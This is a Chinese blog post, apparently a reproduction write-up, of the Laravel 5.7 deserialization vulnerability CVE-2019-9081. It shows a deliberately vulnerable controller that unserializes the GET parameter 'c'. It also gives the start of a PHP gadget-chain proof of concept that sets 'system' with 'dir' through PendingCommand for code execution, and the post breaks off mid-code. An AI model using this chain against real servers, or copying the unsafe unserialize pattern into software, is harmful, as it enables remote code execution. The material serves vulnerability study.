CVE-2019-9081--laravel5.7 反序列化漏洞复现

本文详细介绍了Laravel 5.7框架中的一个反序列化漏洞,通过分析代码流程,展示了如何构造POC以触发该漏洞,涉及 PendingCommand 类的 __destruct 方法和代码执行。在复现过程中,利用了 GenericUser 和 DefaultGenerator 类的 __get 魔术方法来绕过限制,最终实现代码执行。文章还提供了相关参考链接以便进一步研究。

目录​​​​​​​

简介:

环境部署:

分析:

参考文章:


简介:

和yii一样,Laravel也是一套简洁、优雅的PHPWeb开发框架(PHP Web Framework)。

 在laravel框架中没有找到合适的触发点,因此需要对基于laravel v5.7框架进行二次开发的cms进行再次审计,寻找可控的反序列化点,才能触发该漏洞。

环境部署:

去github上下载文件:

https://github.com/laravel/laravel/tree/5.7

下载的文件放在phpstudy的WWW目录下,由于没有vendor目录,需要在根目录执行命令:

composer install

我们需要自己构造一个漏洞demo,用作poc的验证。 

 构造一个反序列化的利用点,在routes/web.php里面加一条路由:

Route::get('/unserialize',"UnserializeController@uns");

在App\Http\Controllers下面写一个控制器UnserializeController.php文件: 

<?php

namespace App\Http\Controllers;

class UnserializeController extends Controller
{
    public function uns(){
        if(isset($_GET['c'])){
            unserialize($_GET['c']);
        }else{
            highlight_file(__FILE__);
        }
        return "uns";
    }
}

分析:

使用的poc:

<?php
namespace Illuminate\Foundation\Testing{

    use Illuminate\Auth\GenericUser;
    use Illuminate\Foundation\Application;

    class PendingCommand
    {
        protected $command;
        protected $parameters;
        public $test;
        protected $app;
        public function __construct(){
            $this->command="system";
            $this->parameters[]="dir";
            $this->test=new GenericUser();
            $this->app=new Application();
        }
    }
}
namespace Illuminate\Foundation{
    class Application{
        protected $bindings = [];
        public function __construct(){
            $this->bindings=array(
                'Illuminate\Contracts\Console\Kernel'=>array(
                    'concrete'=>'Illuminate\Foundation\Application'
                )
            );
        }
    }
}
namespace Illuminate\Auth{
    class GenericUser
    {
        protected $attributes;
        public function __construct(){
            $this->attributes['expectedO
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值